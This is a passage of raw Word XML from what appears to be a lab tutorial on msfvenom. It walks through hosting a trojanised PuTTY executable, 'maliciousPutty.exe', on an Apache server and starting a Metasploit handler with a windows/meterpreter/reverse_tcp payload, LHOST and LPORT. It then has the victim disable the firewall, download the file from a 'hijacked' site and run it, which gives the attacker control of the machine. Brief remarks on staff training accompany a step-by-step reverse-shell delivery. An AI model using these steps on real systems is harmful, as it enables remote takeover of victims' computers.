        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="443CC040">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we will create a server to </w:t>
      </w:r>
      <w:r w:rsidR="39DD5270">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">put this new Putty executable on. This requires </w:t>
      </w:r>
      <w:r w:rsidR="39DD5270">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="19C398E5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="39DD5270">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML</w:t>
      </w:r>
      <w:r w:rsidR="39DD5270">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page that lis</w:t>
      </w:r>
      <w:r w:rsidR="7A50BE14">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ts all the files in a directory. Use the command </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="7A50BE14">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>service apache2 start</w:t>
      </w:r>
      <w:r w:rsidR="7A50BE14">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="7A50BE14">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>service apache2 status</w:t>
      </w:r>
      <w:r w:rsidR="7A50BE14">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to start and check the status of the new web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="40FD69D3" w14:textId="00E86DEB">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="30C2529D" w:rsidP="577B6A5F" w:rsidRDefault="30C2529D" w14:paraId="731B0E08" w14:textId="698E2309">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="30C2529D">
        <w:drawing>
          <wp:inline wp14:editId="0BB989BA" wp14:anchorId="617CA64F">
            <wp:extent cx="5943600" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114025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7266b703742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C2529D">
        <w:rPr/>
        <w:t xml:space="preserve">The default directory for this server is /var/www/html so this is where we </w:t>
      </w:r>
      <w:r w:rsidR="35886698">
        <w:rPr/>
        <w:t>will copy our maliciousPutty executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35886698" w:rsidP="577B6A5F" w:rsidRDefault="35886698" w14:paraId="5E09C7B9" w14:textId="31D409E4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35886698">
        <w:rPr/>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="35886698">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>cp maliciousPutty.exe /var/www/html</w:t>
      </w:r>
      <w:r w:rsidR="35886698">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> then run </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="35886698">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>ls /var/www/html</w:t>
      </w:r>
      <w:r w:rsidR="35886698">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check that the executable is there.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79C2C8AB" w:rsidP="577B6A5F" w:rsidRDefault="79C2C8AB" w14:paraId="40EF620D" w14:textId="7D437284">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="79C2C8AB">
        <w:drawing>
          <wp:inline wp14:editId="58F2DC58" wp14:anchorId="6F717B8A">
            <wp:extent cx="5257800" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57455345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abf8cc8b448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E3211" w:rsidP="577B6A5F" w:rsidRDefault="589E3211" w14:paraId="4E26B71F" w14:textId="5473D0D4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="589E3211">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Section 3: Creating a listener server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="589E3211" w:rsidP="577B6A5F" w:rsidRDefault="589E3211" w14:paraId="32CCAD1D" w14:textId="4625FB6B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="589E3211">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will now create a </w:t>
      </w:r>
      <w:r w:rsidR="1DEEE471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>listener server</w:t>
      </w:r>
      <w:r w:rsidR="589E3211">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that we can control the victim m</w:t>
      </w:r>
      <w:r w:rsidR="336ACA2D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">achine </w:t>
      </w:r>
      <w:r w:rsidR="2DBFED6E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>after it</w:t>
      </w:r>
      <w:r w:rsidR="2DBFED6E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is infected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2DBFED6E" w:rsidP="577B6A5F" w:rsidRDefault="2DBFED6E" w14:paraId="69A78005" w14:textId="6318C295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2DBFED6E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2DBFED6E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="2DBFED6E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to begin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="199D4ADE" w:rsidP="577B6A5F" w:rsidRDefault="199D4ADE" w14:paraId="2EFB4FF1" w14:textId="3E89B4B8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199D4ADE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="199D4ADE">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="199D4ADE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> this creates a listener server that can handle multiple vic</w:t>
      </w:r>
      <w:r w:rsidR="774AADAF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>tims.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="774AADAF" w:rsidP="577B6A5F" w:rsidRDefault="774AADAF" w14:paraId="17B18B49" w14:textId="278F2850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774AADAF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we will set the payload to match up with our executable. Use the command </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="774AADAF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="774AADAF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="774AADAF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D88CFEB" w:rsidP="577B6A5F" w:rsidRDefault="6D88CFEB" w14:paraId="3B762D0F" w14:textId="61871A1D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6D88CFEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>set LHOST 216.0.0.10</w:t>
      </w:r>
      <w:r w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
      <w:r w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> notice that </w:t>
      </w:r>
      <w:r w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>these match</w:t>
      </w:r>
      <w:r w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> up with what we entered for our executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D88CFEB" w:rsidP="577B6A5F" w:rsidRDefault="6D88CFEB" w14:paraId="28497F2D" w14:textId="1AA4C245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6D88CFEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="6D88CFEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and our server will begin to listen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="26B5CB7D" w14:textId="49FF6CE7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CC49EA2" w:rsidP="577B6A5F" w:rsidRDefault="6CC49EA2" w14:paraId="64074A7C" w14:textId="57D62B76">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="6CC49EA2">
        <w:drawing>
          <wp:inline wp14:editId="422C5A05" wp14:anchorId="763D0B02">
            <wp:extent cx="4534533" cy="1590897"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1719870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e64e06c32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49EA2" w:rsidP="577B6A5F" w:rsidRDefault="6CC49EA2" w14:paraId="16E171C9" w14:textId="33478D05">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Section 4: Firewall Problems</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="6CC49EA2" w:rsidP="577B6A5F" w:rsidRDefault="6CC49EA2" w14:paraId="6F86FD19" w14:textId="1367D4E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The main issue with a </w:t>
      </w:r>
      <w:r w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack is the operating system </w:t>
      </w:r>
      <w:r w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can be disabled in a couple </w:t>
      </w:r>
      <w:r w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ways</w:t>
      </w:r>
      <w:r w:rsidR="6CC49EA2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. In a real-life situation, a hacker would use some type of s</w:t>
      </w:r>
      <w:r w:rsidR="4D734019">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ocial engineering to have a user disable their </w:t>
      </w:r>
      <w:r w:rsidR="4D734019">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r w:rsidR="4D734019">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. The best way to defend against these attacks, therefore, is to train staff and let them know what commands like this can do, as well as show them what hap</w:t>
      </w:r>
      <w:r w:rsidR="159B6386">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>pens if this attack is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F721EDA" w:rsidP="577B6A5F" w:rsidRDefault="4F721EDA" w14:paraId="437ADF0F" w14:textId="7E23B63F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4F721EDA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the </w:t>
      </w:r>
      <w:r w:rsidR="4F721EDA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>victims</w:t>
      </w:r>
      <w:r w:rsidR="4F721EDA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. Luckly for us, there is a simple command ready for us to run via the desktop. This executable runs a command. The best way to prevent attacks is to make sure users </w:t>
      </w:r>
      <w:r w:rsidR="1CBEB296">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>understand what this command does, and what it is. Now, we will run it for the sake of testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="5334BE3C" w14:textId="68D74F1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1CBEB296" w:rsidP="577B6A5F" w:rsidRDefault="1CBEB296" w14:paraId="59D13E16" w14:textId="7CE697FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="1CBEB296">
        <w:drawing>
          <wp:inline wp14:editId="40ADFF16" wp14:anchorId="1D6EE68E">
            <wp:extent cx="5257800" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="719846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bfd2647421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EB296" w:rsidP="577B6A5F" w:rsidRDefault="1CBEB296" w14:paraId="38E4FD42" w14:textId="5CD2EE93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="1CBEB296">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Click Yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="7E0889ED" w14:textId="1AED4AD0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="08A7FDDF" w14:textId="222ECAD0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="3CA78058" w14:textId="651E2E58">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="4AFF86A9" w14:textId="632F1B49">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1CBEB296" w:rsidP="577B6A5F" w:rsidRDefault="1CBEB296" w14:paraId="298ECFC1" w14:textId="79F11FAD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="1CBEB296">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="348F7104">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Downloading the Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="348F7104" w:rsidP="577B6A5F" w:rsidRDefault="348F7104" w14:paraId="61C1BFDF" w14:textId="6154FBCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="348F7104">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the victim’s machine, go to </w:t>
      </w:r>
      <w:hyperlink r:id="R825ca796beec47e7">
        <w:r w:rsidRPr="577B6A5F" w:rsidR="348F7104">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
          </w:rPr>
          <w:t>www.software.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="348F7104">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. This is the website we “hijacked</w:t>
      </w:r>
      <w:r w:rsidR="348F7104">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>”,</w:t>
      </w:r>
      <w:r w:rsidR="348F7104">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but you could also go to your </w:t>
      </w:r>
      <w:r w:rsidR="348F7104">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
      <w:r w:rsidR="348F7104">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> web server directly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10DCDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="76A647D7" w14:textId="0A7975C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>maliciousPutty.exe</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10DCDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="2C49F36F" w14:textId="2957B46E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="10DCDACA">
        <w:drawing>
          <wp:inline wp14:editId="1704286C" wp14:anchorId="6B87507A">
            <wp:extent cx="5257800" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="632333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2363da2cf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CDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="44F70E92" w14:textId="7FCC3634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="10DCDACA">
        <w:rPr/>
        <w:t xml:space="preserve">Depending on computer settings, click </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>keep</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr/>
        <w:t xml:space="preserve"> if prompted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10DCDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="457FAE6A" w14:textId="374B58FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="10DCDACA">
        <w:rPr/>
        <w:t xml:space="preserve">Open the file and click </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10DCDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="00705134" w14:textId="72771B72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that Putty appears. However, we can also now access the </w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>victims</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10DCDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="74492CF9" w14:textId="7D3EF5FC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I will now go through </w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>several</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use cases that a hacker could use </w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10DCDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="0507606C" w14:textId="21340B70">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Section 6.1: Using </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
